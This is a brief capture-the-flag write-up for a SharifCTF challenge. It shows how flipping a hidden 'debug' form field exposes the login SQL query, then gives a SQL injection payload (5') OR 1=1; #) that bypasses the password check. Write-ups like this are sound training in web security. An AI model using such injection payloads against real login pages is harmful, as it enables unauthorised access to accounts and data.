Another challenge SharifCTF called hidden input.

  • Category: Forensics
  • Points: 50
Login if you can :)


At first we are presented with a simple webpage containing 2 inputs - login and password.

<!DOCTYPE html>
	<link href='fonts.css' rel='stylesheet' type='text/css'>
	<link rel="stylesheet" type="text/css" href="asset/style.css">
	<div class="logo"><div class="lspan">SharifCTF</div></div>
	<form method="POST" action="login.php">
		<div class="login-block">
			<input type="text" value="" placeholder="Username" id="Username" name="Username"/>
			<input type="password" value="" placeholder="Password" id="Password" name="Password"/>
			<input type="hidden" name="debug" id="debug" value="0">

But upon inspecting the source code, we can see a hidden input - called debug. After changing its value to 1 and logging in, in addition to the login failed message we can see whole SQL query.

username: admin
password: asd
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('asd')

Let’s construct a simple SQL injection in order to get into the webpage. Firstly, we have to add some value into the password variable, then add ' character to close the previous quotation mark an finally SQL statement that will trick the query OR 1=1;. Last step is to comment out left characters from the original query.

username: admin
password: 5') OR 1=1; #
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('5') OR 1=1; #')


No external tools used